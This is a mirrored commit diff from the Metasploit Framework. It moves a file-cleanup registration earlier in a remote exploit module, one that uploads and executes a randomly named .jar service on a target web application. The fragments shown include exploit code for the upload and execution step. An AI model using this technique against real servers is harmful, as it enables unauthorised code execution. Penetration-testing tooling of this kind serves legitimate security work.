1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-29 18:07:27 +01:00

Register early so the cleanup can actually rm the file

This commit is contained in:
wchen-r7 2016-01-12 15:22:03 -06:00
parent 78bc394f80
commit 514199e88f

View File

@ -75,6 +75,11 @@ class Metasploit3 < Msf::Exploit::Remote
def upload_exec(session,rpath)
contents=''
name = Rex::Text.rand_text_alpha(8)
# We must register this file early, that way the on_new_session method
# won't miss it if FileDropper's cleanup routine kicks in.
register_file_for_cleanup("webapps#{rpath}/WEB-INF/services/#{name}.jar")
services_xml = %Q{
<service name="#{name}" scope="application">
<description>
@ -216,7 +221,6 @@ class Metasploit3 < Msf::Exploit::Remote
end
if res and res.code > 200 and res.code < 300
register_file_for_cleanup("webapps#{rpath}/WEB-INF/services/#{name}.jar")
throw :stop # exit loop
elsif res and res.code == 401
if (res.headers['WWW-Authenticate'])
@ -226,7 +230,6 @@ class Metasploit3 < Msf::Exploit::Remote
if authmsg
print_error("WWW-Authenticate: %s" % authmsg)
end
register_file_for_cleanup("webapps#{rpath}/WEB-INF/services/#{name}.jar")
raise ::Rex::ConnectionError
throw :stop # exit loop
end